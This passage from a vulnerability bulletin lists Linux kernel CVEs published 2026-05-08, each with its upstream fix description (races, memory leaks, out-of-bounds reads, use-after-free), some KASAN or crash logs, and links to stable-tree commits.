https://git.kernel.org/stable/c/1e800e26d54ccf2ddf2ea6d6cbe021c804d8aa62 https://git.kernel.org/stable/c/6288baf0c8c4dcfbf206773aede9c1f2269cec28 https://git.kernel.org/stable/c/46aea90763832cd6e9b0c2e1c00e6a9512156d4b https://git.kernel.org/stable/c/2e2baa8fb5aa4d080cbfeb84c51eff797529f413 https://git.kernel.org/stable/c/807e4fb5140c73eb5dba1e399a990db5c1f3cdf8 https://git.kernel.org/stable/c/c65f1b840ab8ce72ba68f1b63bab7960f8fdfa89 https://git.kernel.org/stable/c/078b446efc0f5e496c31bccb72b98af979963a83 https://git.kernel.org/stable/c/c1c8550e70401159184130a1afc6261db01fc0ce |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: rust_binder: fix oneway spam detection The spam detection logic in TreeRange was executed before the current request was inserted into the tree. So the new request was not being factored in the spam calculation. Fix this by moving the logic after the new range has been inserted. Also, the detection logic for ArrayRange was missing altogether which meant large spamming transactions could get away without being detected. Fix this by implementing an equivalent low_oneway_space() in ArrayRange. Note that I looked into centralizing this logic in RangeAllocator but iterating through 'state' and 'size' got a bit too complicated (for me) and I abandoned this effort. | 2026-05-08 | not yet calculated | CVE-2026-43435 | https://git.kernel.org/stable/c/edf685946c4acbe57cb96f8d5f3c07e9a2e973c8 https://git.kernel.org/stable/c/8d34c993a9a156e657e43cb95186980745cc3597 https://git.kernel.org/stable/c/4fc87c240b8f30e22b7ebaae29d57105589e1c0b |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: ALSA: usb-audio: Check endpoint numbers at parsing Scarlett2 mixer interfaces The Scarlett2 mixer quirk in USB-audio driver may hit a NULL dereference when a malformed USB descriptor is passed, since it assumes the presence of an endpoint in the parsed interface in scarlett2_find_fc_interface(), as reported by fuzzer. For avoiding the NULL dereference, just add the sanity check of bNumEndpoints and skip the invalid interface. | 2026-05-08 | not yet calculated | CVE-2026-43436 | https://git.kernel.org/stable/c/b014cc945baba75816cda0cf8934be87c9ed4947 https://git.kernel.org/stable/c/c5c5a6c53cf3b658f1d4512dfa61f3cd25bc34ba https://git.kernel.org/stable/c/b267255c15d2a5b90c4e926146aa155e5161e264 https://git.kernel.org/stable/c/3d542cf3c4c854cdf5d58049771f68926b9eb2b9 https://git.kernel.org/stable/c/3d4f23885e4b90347c9a1d779af6e79a99b5172a https://git.kernel.org/stable/c/df1d8abf36ca3681c21a6809eaa9a1e01ef897a6 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: cgroup: fix race between task migration and iteration When a task is migrated out of a css_set, cgroup_migrate_add_task() first moves it from cset->tasks to cset->mg_tasks via: list_move_tail(&task->cg_list, &cset->mg_tasks); If a css_task_iter currently has it->task_pos pointing to this task, css_set_move_task() calls css_task_iter_skip() to keep the iterator valid. However, since the task has already been moved to ->mg_tasks, the iterator is advanced relative to the mg_tasks list instead of the original tasks list. As a result, remaining tasks on cset->tasks, as well as tasks queued on cset->mg_tasks, can be skipped by iteration. Fix this by calling css_set_skip_task_iters() before unlinking task->cg_list from cset->tasks. This advances all active iterators to the next task on cset->tasks, so iteration continues correctly even when a task is concurrently being migrated. This race is hard to hit in practice without instrumentation, but it can be reproduced by artificially slowing down cgroup_procs_show(). For example, on an Android device a temporary /sys/kernel/cgroup/cgroup_test knob can be added to inject a delay into cgroup_procs_show(), and then: 1) Spawn three long-running tasks (PIDs 101, 102, 103). 2) Create a test cgroup and move the tasks into it. 3) Enable a large delay via /sys/kernel/cgroup/cgroup_test. 4) In one shell, read cgroup.procs from the test cgroup. 5) Within the delay window, in another shell migrate PID 102 by writing it to a different cgroup.procs file. Under this setup, cgroup.procs can intermittently show only PID 101 while skipping PID 103. Once the migration completes, reading the file again shows all tasks as expected. Note that this change does not allow removing the existing css_set_skip_task_iters() call in css_set_move_task(). The new call in cgroup_migrate_add_task() only handles iterators that are racing with migration while the task is still on cset->tasks. Iterators may also start after the task has been moved to cset->mg_tasks. If we dropped css_set_skip_task_iters() from css_set_move_task(), such iterators could keep task_pos pointing to a migrating task, causing css_task_iter_advance() to malfunction on the destination css_set, up to and including crashes or infinite loops. The race window between migration and iteration is very small, and css_task_iter is not on a hot path. In the worst case, when an iterator is positioned on the first thread of the migrating process, cgroup_migrate_add_task() may have to skip multiple tasks via css_set_skip_task_iters(). However, this only happens when migration and iteration actually race, so the performance impact is negligible compared to the correctness fix provided here. | 2026-05-08 | not yet calculated | CVE-2026-43439 | https://git.kernel.org/stable/c/7c85debc35e6d131bd29c64f2ae78c6ede0e55c4 https://git.kernel.org/stable/c/3b95abab7369235a37b15eaec6e1a0b443bba7c7 https://git.kernel.org/stable/c/4a9654a2b46cfdaae287fb8995f536245635e467 https://git.kernel.org/stable/c/3dfd1328c05234e8d8fa61948b2ba82680594988 https://git.kernel.org/stable/c/9cca530c7cc1b3e02cb8fa7f80060dd4b38562ce https://git.kernel.org/stable/c/86ceaccfdfa16dad05addb33dc206e03589bcfd1 https://git.kernel.org/stable/c/9dc76f6fc0d28d2382583715bc4ec22f28104845 https://git.kernel.org/stable/c/5ee01f1a7343d6a3547b6802ca2d4cdce0edacb1 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: net/mana: Null service_wq on setup error to prevent double destroy In mana_gd_setup() error path, set gc->service_wq to NULL after destroy_workqueue() to match the cleanup in mana_gd_cleanup(). This prevents a use-after-free if the workqueue pointer is checked after a failed setup. | 2026-05-08 | not yet calculated | CVE-2026-43440 | https://git.kernel.org/stable/c/59489ce60d7412ed82fb1d8002faa3102dcd4916 https://git.kernel.org/stable/c/6c92392602b451e3869f15ab685f8f650e942b13 https://git.kernel.org/stable/c/87c2302813abc55c46485711a678e3c312b00666 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: ASoC: amd: acp-mach-common: Add missing error check for clock acquisition The acp_card_rt5682_init() and acp_card_rt5682s_init() functions did not check the return values of clk_get(). This could lead to a kernel crash when the invalid pointers are later dereferenced by clock core functions. Fix this by: 1. Changing clk_get() to the device-managed devm_clk_get(). 2. Adding IS_ERR() checks immediately after each clock acquisition. | 2026-05-08 | not yet calculated | CVE-2026-43443 | https://git.kernel.org/stable/c/0cee68fb7f4cf1562e067c5a82d25062a973b0d0 https://git.kernel.org/stable/c/30c64fb9839949f085c8eb55b979cbd8a4c51f00 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: drm/amdkfd: Unreserve bo if queue update failed Error handling path should unreserve bo then return failed. (cherry picked from commit c24afed7de9ecce341825d8ab55a43a254348b33) | 2026-05-08 | not yet calculated | CVE-2026-43444 | https://git.kernel.org/stable/c/781110700ada22168fbb490dd61432d23a17a5b4 https://git.kernel.org/stable/c/529c985da1b277b36dc99aad660f96dc70f3c467 https://git.kernel.org/stable/c/b2b7742c465c8e3b36dc325a48abb4b9f2aaa38b https://git.kernel.org/stable/c/2ce75a0b7e1bfddbcb9bc8aeb2e5e7fa99971acf |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: e1000/e1000e: Fix leak in DMA error cleanup If an error is encountered while mapping TX buffers, the driver should unmap any buffers already mapped for that skb. Because count is incremented after a successful mapping, it will always match the correct number of unmappings needed when dma_error is reached. Decrementing count before the while loop in dma_error causes an off-by-one error. If any mapping was successful before an unsuccessful mapping, exactly one DMA mapping would leak. In these commits, a faulty while condition caused an infinite loop in dma_error: Commit 03b1320dfcee ("e1000e: remove use of skb_dma_map from e1000e driver") Commit 602c0554d7b0 ("e1000: remove use of skb_dma_map from e1000 driver") Commit c1fa347f20f1 ("e1000/e1000e/igb/igbvf/ixgb/ixgbe: Fix tests of unsigned in *_tx_map()") fixed the infinite loop, but introduced the off-by-one error. This issue may still exist in the igbvf driver, but I did not address it in this patch. | 2026-05-08 | not yet calculated | CVE-2026-43445 | https://git.kernel.org/stable/c/7eaeb778bfaa3b2a804f89321c234d59c74569db https://git.kernel.org/stable/c/0606c24a745bafd1be5d66c48361638cd9cad74b https://git.kernel.org/stable/c/519051c711dfd239ef6e4b28878efee400a035f9 https://git.kernel.org/stable/c/0a1fc25deabab4efce64610e3c449485c4fa8f5f https://git.kernel.org/stable/c/fa5ba9867a55e640df0dc79bf0199770fb043f03 https://git.kernel.org/stable/c/30e87ade8d678c25a8546cf38c0b498fa5cb27d3 https://git.kernel.org/stable/c/10b5e65959e955a1c8894e0a5413944b5a70204a https://git.kernel.org/stable/c/e94eaef11142b01f77bf8ba4d0b59720b7858109 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: accel/amdxdna: Fix runtime suspend deadlock when there is pending job The runtime suspend callback drains the running job workqueue before suspending the device. If a job is still executing and calls pm_runtime_resume_and_get(), it can deadlock with the runtime suspend path. Fix this by moving pm_runtime_resume_and_get() from the job execution routine to the job submission routine, ensuring the device is resumed before the job is queued and avoiding the deadlock during runtime suspend. | 2026-05-08 | not yet calculated | CVE-2026-43446 | https://git.kernel.org/stable/c/ac72e7385a2c7533dd766de4197134d96230be85 https://git.kernel.org/stable/c/6b13cb8f48a42ddf6dd98865b673a82e37ff238b |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: nvme-pci: Fix race bug in nvme_poll_irqdisable() In the following scenario, pdev can be disabled between (1) and (3) by (2). This sets pdev->msix_enabled = 0. Then, pci_irq_vector() will return MSI-X IRQ(>15) for (1) whereas return INTx IRQ(<=15) for (2). This causes IRQ warning because it tries to enable INTx IRQ that has never been disabled before. To fix this, save IRQ number into a local variable and ensure disable_irq() and enable_irq() operate on the same IRQ number. Even if pci_free_irq_vectors() frees the IRQ concurrently, disable_irq() and enable_irq() on a stale IRQ number is still valid and safe, and the depth accounting remains balanced. task 1: nvme_poll_irqdisable() disable_irq(pci_irq_vector(pdev, nvmeq->cq_vector)) ...(1) enable_irq(pci_irq_vector(pdev, nvmeq->cq_vector)) ...(3) task 2: nvme_reset_work() nvme_dev_disable() pdev->msix_enable = 0; ...(2) crash log: ------------[ cut here ]------------ Unbalanced enable for IRQ 10 WARNING: kernel/irq/manage.c:753 at __enable_irq+0x102/0x190 kernel/irq/manage.c:753, CPU#1: kworker/1:0H/26 Modules linked in: CPU: 1 UID: 0 PID: 26 Comm: kworker/1:0H Not tainted 6.19.0-dirty #9 PREEMPT(voluntary) Hardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS rel-1.16.3-0-ga6ed6b701f0a-prebuilt.qemu.org 04/01/2014 Workqueue: kblockd blk_mq_timeout_work RIP: 0010:__enable_irq+0x107/0x190 kernel/irq/manage.c:753 Code: ff df 48 89 fa 48 c1 ea 03 0f b6 14 02 48 89 f8 83 e0 07 83 c0 03 38 d0 7c 04 84 d2 75 79 48 8d 3d 2e 7a 3f 05 41 8b 74 24 2c <67> 48 0f b9 3a e8 ef b9 21 00 5b 41 5c 5d e9 46 54 66 03 e8 e1 b9 RSP: 0018:ffffc900001bf550 EFLAGS: 00010046 RAX: 0000000000000007 RBX: 0000000000000000 RCX: ffffffffb20c0e90 RDX: 0000000000000000 RSI: 000000000000000a RDI: ffffffffb74b88f0 RBP: ffffc900001bf560 R08: ffff88800197cf00 R09: 0000000000000001 R10: 0000000000000003 R11: 0000000000000003 R12: ffff8880012a6000 R13: 1ffff92000037eae R14: 000000000000000a R15: 0000000000000293 FS: 0000000000000000(0000) GS:ffff8880b49f7000(0000) knlGS:0000000000000000 CS: 0010 DS: 0000 ES: 0000 CR0: 0000000080050033 CR2: 0000555da4a25fa8 CR3: 00000000208e8000 CR4: 00000000000006f0 Call Trace: <TASK> enable_irq+0x121/0x1e0 kernel/irq/manage.c:797 nvme_poll_irqdisable+0x162/0x1c0 drivers/nvme/host/pci.c:1494 nvme_timeout+0x965/0x14b0 drivers/nvme/host/pci.c:1744 blk_mq_rq_timed_out block/blk-mq.c:1653 [inline] blk_mq_handle_expired+0x227/0x2d0 block/blk-mq.c:1721 bt_iter+0x2fc/0x3a0 block/blk-mq-tag.c:292 __sbitmap_for_each_set include/linux/sbitmap.h:269 [inline] sbitmap_for_each_set include/linux/sbitmap.h:290 [inline] bt_for_each block/blk-mq-tag.c:324 [inline] blk_mq_queue_tag_busy_iter+0x969/0x1e80 block/blk-mq-tag.c:536 blk_mq_timeout_work+0x627/0x870 block/blk-mq.c:1763 process_one_work+0x956/0x1aa0 kernel/workqueue.c:3257 process_scheduled_works kernel/workqueue.c:3340 [inline] worker_thread+0x65c/0xe60 kernel/workqueue.c:3421 kthread+0x41a/0x930 kernel/kthread.c:463 ret_from_fork+0x6f8/0x8c0 arch/x86/kernel/process.c:158 ret_from_fork_asm+0x1a/0x30 arch/x86/entry/entry_64.S:246 </TASK> irq event stamp: 74478 hardirqs last enabled at (74477): [<ffffffffb5720a9c>] __raw_spin_unlock_irq include/linux/spinlock_api_smp.h:159 [inline] hardirqs last enabled at (74477): [<ffffffffb5720a9c>] _raw_spin_unlock_irq+0x2c/0x60 kernel/locking/spinlock.c:202 hardirqs last disabled at (74478): [<ffffffffb57207b5>] __raw_spin_lock_irqsave include/linux/spinlock_api_smp.h:108 [inline] hardirqs last disabled at (74478): [<ffffffffb57207b5>] _raw_spin_lock_irqsave+0x85/0xa0 kernel/locking/spinlock.c:162 softirqs last enabled at (74304): [<ffffffffb1e9466c>] __do_softirq kernel/softirq.c:656 [inline] softirqs last enabled at (74304): [<ffffffffb1e9466c>] invoke_softirq kernel/softirq.c:496 [inline] softirqs last enabled at (74304): [<ffffffffb1e9466c>] __irq_exit_rcu+0xdc/0x120 ---truncated--- | 2026-05-08 | not yet calculated | CVE-2026-43448 | https://git.kernel.org/stable/c/265dbc9bc33c29f60f90be3e0afe1c4067ebb70b https://git.kernel.org/stable/c/628773eba024d1107cc9ec157a682cbb42ac912a https://git.kernel.org/stable/c/843e913cef4e33723663a899727f685a95ab53fe https://git.kernel.org/stable/c/b56c49897bdac5cb49e3495ef421c391628ee9bb https://git.kernel.org/stable/c/e311d84c62eb76e025e11a44155b402e55950b83 https://git.kernel.org/stable/c/fc71f409b22ca831a9f87a2712eaa09ef2bb4a5e |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: nvme-pci: Fix slab-out-of-bounds in nvme_dbbuf_set dev->online_queues is a count incremented in nvme_init_queue. Thus, valid indices are 0 through dev->online_queues − 1. This patch fixes the loop condition to ensure the index stays within the valid range. Index 0 is excluded because it is the admin queue. KASAN splat: ================================================================== BUG: KASAN: slab-out-of-bounds in nvme_dbbuf_free drivers/nvme/host/pci.c:377 [inline] BUG: KASAN: slab-out-of-bounds in nvme_dbbuf_set+0x39c/0x400 drivers/nvme/host/pci.c:404 Read of size 2 at addr ffff88800592a574 by task kworker/u8:5/74 CPU: 0 UID: 0 PID: 74 Comm: kworker/u8:5 Not tainted 6.19.0-dirty #10 PREEMPT(voluntary) Hardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS rel-1.16.3-0-ga6ed6b701f0a-prebuilt.qemu.org 04/01/2014 Workqueue: nvme-reset-wq nvme_reset_work Call Trace: <TASK> __dump_stack lib/dump_stack.c:94 [inline] dump_stack_lvl+0xea/0x150 lib/dump_stack.c:120 print_address_description mm/kasan/report.c:378 [inline] print_report+0xce/0x5d0 mm/kasan/report.c:482 kasan_report+0xdc/0x110 mm/kasan/report.c:595 __asan_report_load2_noabort+0x18/0x20 mm/kasan/report_generic.c:379 nvme_dbbuf_free drivers/nvme/host/pci.c:377 [inline] nvme_dbbuf_set+0x39c/0x400 drivers/nvme/host/pci.c:404 nvme_reset_work+0x36b/0x8c0 drivers/nvme/host/pci.c:3252 process_one_work+0x956/0x1aa0 kernel/workqueue.c:3257 process_scheduled_works kernel/workqueue.c:3340 [inline] worker_thread+0x65c/0xe60 kernel/workqueue.c:3421 kthread+0x41a/0x930 kernel/kthread.c:463 ret_from_fork+0x6f8/0x8c0 arch/x86/kernel/process.c:158 ret_from_fork_asm+0x1a/0x30 arch/x86/entry/entry_64.S:246 </TASK> Allocated by task 34 on cpu 1 at 4.241550s: kasan_save_stack+0x2c/0x60 mm/kasan/common.c:57 kasan_save_track+0x1c/0x70 mm/kasan/common.c:78 kasan_save_alloc_info+0x3c/0x50 mm/kasan/generic.c:570 poison_kmalloc_redzone mm/kasan/common.c:398 [inline] __kasan_kmalloc+0xb5/0xc0 mm/kasan/common.c:415 kasan_kmalloc include/linux/kasan.h:263 [inline] __do_kmalloc_node mm/slub.c:5657 [inline] __kmalloc_node_noprof+0x2bf/0x8d0 mm/slub.c:5663 kmalloc_array_node_noprof include/linux/slab.h:1075 [inline] nvme_pci_alloc_dev drivers/nvme/host/pci.c:3479 [inline] nvme_probe+0x2f1/0x1820 drivers/nvme/host/pci.c:3534 local_pci_probe+0xef/0x1c0 drivers/pci/pci-driver.c:324 pci_call_probe drivers/pci/pci-driver.c:392 [inline] __pci_device_probe drivers/pci/pci-driver.c:417 [inline] pci_device_probe+0x743/0x920 drivers/pci/pci-driver.c:451 call_driver_probe drivers/base/dd.c:583 [inline] really_probe+0x29b/0xb70 drivers/base/dd.c:661 __driver_probe_device+0x3b0/0x4a0 drivers/base/dd.c:803 driver_probe_device+0x56/0x1f0 drivers/base/dd.c:833 __driver_attach_async_helper+0x155/0x340 drivers/base/dd.c:1159 async_run_entry_fn+0xa6/0x4b0 kernel/async.c:129 process_one_work+0x956/0x1aa0 kernel/workqueue.c:3257 process_scheduled_works kernel/workqueue.c:3340 [inline] worker_thread+0x65c/0xe60 kernel/workqueue.c:3421 kthread+0x41a/0x930 kernel/kthread.c:463 ret_from_fork+0x6f8/0x8c0 arch/x86/kernel/process.c:158 ret_from_fork_asm+0x1a/0x30 arch/x86/entry/entry_64.S:246 The buggy address belongs to the object at ffff88800592a000 which belongs to the cache kmalloc-2k of size 2048 The buggy address is located 244 bytes to the right of allocated 1152-byte region [ffff88800592a000, ffff88800592a480) The buggy address belongs to the physical page: page: refcount:0 mapcount:0 mapping:0000000000000000 index:0x0 pfn:0x5928 head: order:3 mapcount:0 entire_mapcount:0 nr_pages_mapped:0 pincount:0 anon flags: 0xfffffc0000040(head|node=0|zone=1|lastcpupid=0x1fffff) page_type: f5(slab) raw: 000fffffc0000040 ffff888001042000 0000000000000000 dead000000000001 raw: 0000000000000000 0000000000080008 00000000f5000000 0000000000000000 head: 000fffffc0000040 ffff888001042000 00000 ---truncated--- | 2026-05-08 | not yet calculated | CVE-2026-43449 | https://git.kernel.org/stable/c/2b9d605c3f0d3262142f196249cd3bd58c857c71 https://git.kernel.org/stable/c/86183d550559e45e07059bbdf17331fea469e38c https://git.kernel.org/stable/c/d7990c936e25f484b61a5adeeadc1d290a9fd16e https://git.kernel.org/stable/c/83e6edd6358326c9c2de31a54bb4a1ec50703f1f https://git.kernel.org/stable/c/50bad78f03a02d3c0f228edf9912b494d3e7acb9 https://git.kernel.org/stable/c/328c551f0cc81ee776b186b86cc6e5253bb6fda7 https://git.kernel.org/stable/c/78279d2d74c58a0ed64e43cf601a02649771182e https://git.kernel.org/stable/c/b4e78f1427c7d6859229ae9616df54e1fc05a516 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: netfilter: nfnetlink_cthelper: fix OOB read in nfnl_cthelper_dump_table() nfnl_cthelper_dump_table() has a 'goto restart' that jumps to a label inside the for loop body. When the "last" helper saved in cb->args[1] is deleted between dump rounds, every entry fails the (cur != last) check, so cb->args[1] is never cleared. The for loop finishes with cb->args[0] == nf_ct_helper_hsize, and the 'goto restart' jumps back into the loop body bypassing the bounds check, causing an 8-byte out-of-bounds read on nf_ct_helper_hash[nf_ct_helper_hsize]. The 'goto restart' block was meant to re-traverse the current bucket when "last" is no longer found, but it was placed after the for loop instead of inside it. Move the block into the for loop body so that the restart only occurs while cb->args[0] is still within bounds. BUG: KASAN: slab-out-of-bounds in nfnl_cthelper_dump_table+0x9f/0x1b0 Read of size 8 at addr ffff888104ca3000 by task poc_cthelper/131 Call Trace: nfnl_cthelper_dump_table+0x9f/0x1b0 netlink_dump+0x333/0x880 netlink_recvmsg+0x3e2/0x4b0 sock_recvmsg+0xde/0xf0 __sys_recvfrom+0x150/0x200 __x64_sys_recvfrom+0x76/0x90 do_syscall_64+0xc3/0x6e0 Allocated by task 1: __kvmalloc_node_noprof+0x21b/0x700 nf_ct_alloc_hashtable+0x65/0xd0 nf_conntrack_helper_init+0x21/0x60 nf_conntrack_init_start+0x18d/0x300 nf_conntrack_standalone_init+0x12/0xc0 | 2026-05-08 | not yet calculated | CVE-2026-43450 | https://git.kernel.org/stable/c/0605e1985a95d4334a67869aee45a47e82301abf https://git.kernel.org/stable/c/92441f6d9405a0c18d03f278b395e782f79a4a30 https://git.kernel.org/stable/c/3cc328ffc32ddb389cba7b78b6aa95d995c2876e https://git.kernel.org/stable/c/4a1f6ee69267a5f524102c028981410eeacfa3da https://git.kernel.org/stable/c/894c5780ddadd5fde0e16f66587918e6be1504c4 https://git.kernel.org/stable/c/05018cd9370f77bb18fbf6e15ff33c7a06f10b3c https://git.kernel.org/stable/c/61b3a1f8621df1a5928118313f133996f6a786db https://git.kernel.org/stable/c/6dcee8496d53165b2d8a5909b3050b62ae71fe89 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: netfilter: nfnetlink_queue: fix entry leak in bridge verdict error path nfqnl_recv_verdict() calls find_dequeue_entry() to remove the queue entry from the queue data structures, taking ownership of the entry. For PF_BRIDGE packets, it then calls nfqa_parse_bridge() to parse VLAN attributes. If nfqa_parse_bridge() returns an error (e.g. NFQA_VLAN present but NFQA_VLAN_TCI missing), the function returns immediately without freeing the dequeued entry or its sk_buff. This leaks the nf_queue_entry, its associated sk_buff, and all held references (net_device refcounts, struct net refcount). Repeated triggering exhausts kernel memory. Fix this by dropping the entry via nfqnl_reinject() with NF_DROP verdict on the error path, consistent with other error handling in this file. | 2026-05-08 | not yet calculated | CVE-2026-43451 | https://git.kernel.org/stable/c/a907bea273b60d3e604ec4e8e1f6c49954805794 https://git.kernel.org/stable/c/0b18d1b834ab5a5009be70b530f978d7989e445b https://git.kernel.org/stable/c/b38d2b4603fd3dda24eb8b3dd81c18a0930be97b https://git.kernel.org/stable/c/47b1c5d1b0944aa88299f55a846fabaefc756982 https://git.kernel.org/stable/c/cf4a4df38d1747e06fc54f9879bd7a6f4178032f https://git.kernel.org/stable/c/9853d94b82d303fc4ac37d592a23a154096ecd41 https://git.kernel.org/stable/c/208669df703a25a601f45822b10c413f258bf275 https://git.kernel.org/stable/c/f1ba83755d81c6fc66ac7acd723d238f974091e9 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: netfilter: nft_set_pipapo: fix stack out-of-bounds read in pipapo_drop() pipapo_drop() passes rulemap[i + 1].n to pipapo_unmap() as the to_offset argument on every iteration, including the last one where i == m->field_count - 1. This reads one element past the end of the stack-allocated rulemap array (declared as rulemap[NFT_PIPAPO_MAX_FIELDS] with NFT_PIPAPO_MAX_FIELDS == 16). Although pipapo_unmap() returns early when is_last is true without using the to_offset value, the argument is evaluated at the call site before the function body executes, making this a genuine out-of-bounds stack read confirmed by KASAN: BUG: KASAN: stack-out-of-bounds in pipapo_drop+0x50c/0x57c [nf_tables] Read of size 4 at addr ffff8000810e71a4 This frame has 1 object: [32, 160) 'rulemap' The buggy address is at offset 164 -- exactly 4 bytes past the end of the rulemap array. Pass 0 instead of rulemap[i + 1].n on the last iteration to avoid the out-of-bounds read. | 2026-05-08 | not yet calculated | CVE-2026-43453 | https://git.kernel.org/stable/c/1957e793196e7f8557374fd4eda53abcbb42e1c0 https://git.kernel.org/stable/c/57fb87ca095d5127cd7a27583b8ec43dcf7c9e9e https://git.kernel.org/stable/c/60c1d18781e37bfb96290b86510eb01c5fa24d75 https://git.kernel.org/stable/c/0a55d62cdb628923d8a21724374a70c76ac7d19d https://git.kernel.org/stable/c/dfbdac719198778b581bc0dd055df2542edb8c62 https://git.kernel.org/stable/c/e047f6fbb975f685d6c9fcef95b3b7787a79b46d https://git.kernel.org/stable/c/324b749aa5b2d516ccfab933df9d3f56e7807f5f https://git.kernel.org/stable/c/d6d8cd2db236a9dd13dbc2d05843b3445cc964b5 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: mctp: route: hold key->lock in mctp_flow_prepare_output() mctp_flow_prepare_output() checks key->dev and may call mctp_dev_set_key(), but it does not hold key->lock while doing so. mctp_dev_set_key() and mctp_dev_release_key() are annotated with __must_hold(&key->lock), so key->dev access is intended to be serialized by key->lock. The mctp_sendmsg() transmit path reaches mctp_flow_prepare_output() via mctp_local_output() -> mctp_dst_output() without holding key->lock, so the check-and-set sequence is racy. Example interleaving: CPU0 CPU1 ---- ---- mctp_flow_prepare_output(key, devA) if (!key->dev) // sees NULL mctp_flow_prepare_output( key, devB) if (!key->dev) // still NULL mctp_dev_set_key(devB, key) mctp_dev_hold(devB) key->dev = devB mctp_dev_set_key(devA, key) mctp_dev_hold(devA) key->dev = devA // overwrites devB Now both devA and devB references were acquired, but only the final key->dev value is tracked for release. One reference can be lost, causing a resource leak as mctp_dev_release_key() would only decrease the reference on one dev. Fix by taking key->lock around the key->dev check and mctp_dev_set_key() call. | 2026-05-08 | not yet calculated | CVE-2026-43455 | https://git.kernel.org/stable/c/47893166bc5611ee9a20de6b8d2933b2320fb772 https://git.kernel.org/stable/c/86f5334fcb48a5b611c33364ab52ca684d0f6d91 https://git.kernel.org/stable/c/0695712f3a6f1a48915f95767cfb42077683dcdc https://git.kernel.org/stable/c/925a5ffd99cddd7a7e41d5ad120c7a2c6d50260f https://git.kernel.org/stable/c/8d27d9b260dd19c1b519e1a13de6448f9984e30e https://git.kernel.org/stable/c/7d86aa41c073c4e7eb75fd2e674f1fd8f289728a |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: mctp: i2c: fix skb memory leak in receive path When 'midev->allow_rx' is false, the newly allocated skb isn't consumed by netif_rx(), it needs to free the skb directly. | 2026-05-08 | not yet calculated | CVE-2026-43457 | https://git.kernel.org/stable/c/0fb2adbdd5c03e8c9ebcdc48afd414b2724c85eb https://git.kernel.org/stable/c/d7900a43b0a314a645ca0a2adf45928dbc7001f4 https://git.kernel.org/stable/c/9f81be2ab9d8e4744871bfb3e868ef413413829f https://git.kernel.org/stable/c/1ec54187e1aa40a4cfa2b265e9a311179f24b98d https://git.kernel.org/stable/c/1b1be322342a6b0085bf6ee52235e5ac9834ec25 https://git.kernel.org/stable/c/e3f5e0f22cfc2371e7471c9fd5b4da78f9df7c69 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: serial: caif: hold tty->link reference in ldisc_open and ser_release A reproducer triggers a KASAN slab-use-after-free in pty_write_room() when caif_serial's TX path calls tty_write_room(). The faulting access is on tty->link->port. Hold an extra kref on tty->link for the lifetime of the caif_serial line discipline: get it in ldisc_open() and drop it in ser_release(), and also drop it on the ldisc_open() error path. With this change applied, the reproducer no longer triggers the UAF in my testing. | 2026-05-08 | not yet calculated | CVE-2026-43458 | https://git.kernel.org/stable/c/23a3ac2e2262a291498567418227b99e1f3606b1 https://git.kernel.org/stable/c/52135420e9f75853ea0c6cea7b736e3e98495f7d https://git.kernel.org/stable/c/ca2ceba983bb23ea0202c2882d963253416654a3 https://git.kernel.org/stable/c/8460187b4852fd00bd1c76394358053f3fa4d089 https://git.kernel.org/stable/c/27e43356d0defb9fc7fa25265219a3ffeb7b3e98 https://git.kernel.org/stable/c/35b58d3bc716ebb9ebd10fe1cac8c1177242511c https://git.kernel.org/stable/c/97a0bb491cae39478c6225381f14e9ac67b7bba7 https://git.kernel.org/stable/c/288598d80a068a0e9281de35bcb4ce495f189e2a |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: spi: rockchip-sfc: Fix double-free in remove() callback The driver uses devm_spi_register_controller() for registration, which automatically unregisters the controller via devm cleanup when the device is removed. The manual call to spi_unregister_controller() in the remove() callback can lead to a double-free. And to make sure controller is unregistered before DMA buffer is unmapped, switch to use spi_register_controller() in probe(). | 2026-05-08 | not yet calculated | CVE-2026-43460 | https://git.kernel.org/stable/c/b6051f2bdd4bd3dde85b68558edd3a6843489221 https://git.kernel.org/stable/c/85fb53351e6a3b921357a2178671e847a087e400 https://git.kernel.org/stable/c/111e2863372c322e836e0c896f6dd9cf4ee08c71 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: rxrpc, afs: Fix missing error pointer check after rxrpc_kernel_lookup_peer() rxrpc_kernel_lookup_peer() can also return error pointers in addition to NULL, so just checking for NULL is not sufficient. Fix this by: (1) Changing rxrpc_kernel_lookup_peer() to return -ENOMEM rather than NULL on allocation failure. (2) Making the callers in afs use IS_ERR() and PTR_ERR() to pass on the error code returned. | 2026-05-08 | not yet calculated | CVE-2026-43463 | https://git.kernel.org/stable/c/d55fa7cd4b19ba91b34b307d769c149e56ad0a75 https://git.kernel.org/stable/c/54331c5dcc6d97683d7ca2788e7ef9c9505e1477 https://git.kernel.org/stable/c/4245a79003adf30e67f8e9060915bd05cb31d142 |
